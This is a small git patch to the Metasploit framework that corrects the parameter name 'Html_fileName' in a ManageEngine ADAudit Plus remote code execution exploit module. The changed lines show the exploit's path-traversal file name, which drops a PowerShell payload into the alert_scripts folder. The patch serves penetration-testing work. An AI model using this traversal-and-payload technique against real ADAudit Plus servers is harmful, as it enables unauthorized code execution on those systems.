From b8856bbb87c2794d35317ee5db140ca894350663 Mon Sep 17 00:00:00 2001
From: ErikWynter <erik.wynter@gmail.com>
Date: Fri, 5 May 2023 09:59:11 +0300
Subject: [PATCH] fix capitalization of Htlm_fileName JSON parram

---
 .../http/manage_engine_adaudit_plus/json_post_data.rb       | 6 +++---
 .../http/manageengine_adaudit_plus_authenticated_rce.rb     | 2 +-
 2 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/json_post_data.rb b/lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/json_post_data.rb
index eb4baf7b73..fd6badd95b 100644
--- a/lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/json_post_data.rb
+++ b/lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/json_post_data.rb
@@ -10,7 +10,7 @@ module Msf::Exploit::Remote::HTTP::ManageEngineAdauditPlus::JsonPostData
   # @option options [Integer] :GPO_VERSION The version number of the GPO GUID in use, or a random number from 1 to 9 if one is not supplied.
   # @option options [String] :VER_FILE_NAME The version file name in a format that matches ADAudit Plus's VER_FILE_NAME format.
   # @option options [String] :xmlReport An XML string containing the header to use for the report.
-  # @option options [String] :html_fileName The filename to use for the post request if provided.
+  # @option options [String] :Html_fileName The filename to use for the post request if provided.
   # @option options [String] :htmlReport The location to save the HTML report if provided.
   # @return [String] A string representation of the JSON hash matching the
   #   format required by the GPOWatcherData endpoint. Will be an empty string
@@ -26,8 +26,8 @@ module Msf::Exploit::Remote::HTTP::ManageEngineAdauditPlus::JsonPostData
     post_data['VER_FILE_NAME'] = options['VER_FILE_NAME'] || generate_ver_file_name
     post_data['xmlReport'] = options['xmlReport'] || '<?xml version="1.0" encoding="utf-16"?>'
 
-    html_filename = options['html_fileName']
-    post_data['html_fileName'] = html_filename if html_filename
+    html_fileName = options['Html_fileName']
+    post_data['Html_fileName'] = html_fileName if html_fileName
 
     html_report = options['htmlReport']
     post_data['htmlReport'] = html_report if html_report
diff --git a/modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb b/modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
index 4b4d4862b5..d9258fd57f 100644
--- a/modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
+++ b/modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
@@ -322,7 +322,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     gpo_post_data = {
       'DOMAIN_NAME' => @domain,
-      'html_fileName' => "..\\..\\..\\..\\..\\alert_scripts\\#{ps1_script_name}", # the traversal path to alert_scripts should always be correct no matter where ADAudit Plus is installed
+      'Html_fileName' => "..\\..\\..\\..\\..\\alert_scripts\\#{ps1_script_name}", # the traversal path to alert_scripts should always be correct no matter where ADAudit Plus is installed
       'htmlReport' => payload.encoded
     }